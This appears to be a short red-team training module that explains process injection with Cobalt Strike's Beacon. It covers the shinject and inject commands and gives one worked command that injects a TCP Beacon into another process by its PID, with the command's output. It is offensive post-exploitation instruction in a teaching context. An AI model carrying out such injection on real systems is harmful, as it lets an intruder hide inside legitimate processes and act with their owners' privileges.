Process Injection

Process injection allows us to inject arbitrary shellcode into a process of our choosing. You can only inject into processes that you can obtain a handle to with enough privileges to write into its memory. In a non-elevated context, which usually limits you to your own processes. In an elevated context, this includes processes owned by other users.

Beacon has two main injection commands - shinject and inject. shinject allows you to inject any arbitrary shellcode from a binary file on your attacking machine; and inject will inject a full Beacon payload for the specified listener.

If we wanted to inject a TCP Beacon payload into the MMC process mentioned in the previous module, we could do:

beacon> inject 4464 x64 tcp-local
[*] Tasked beacon to inject windows/beacon_bind_tcp (127.0.0.1:4444) into 4464 (x64)
[+] established link to child beacon: 10.10.123.102

\

Where:

• 4464 is the target PID.

• x64 is the architecture of the process.

• tcp-local is the listener name.

\

The command will also automatically attempt to connect to the child if a P2P listener is used. The resulting Beacon will run with the full privilege of the user who owns the process.

\

\

The same caveats also apply - if the user closes this process, the Beacon will be lost. The shellcode that's injected uses the Exit Thread function, so it won't kill the process if we exit the Beacon.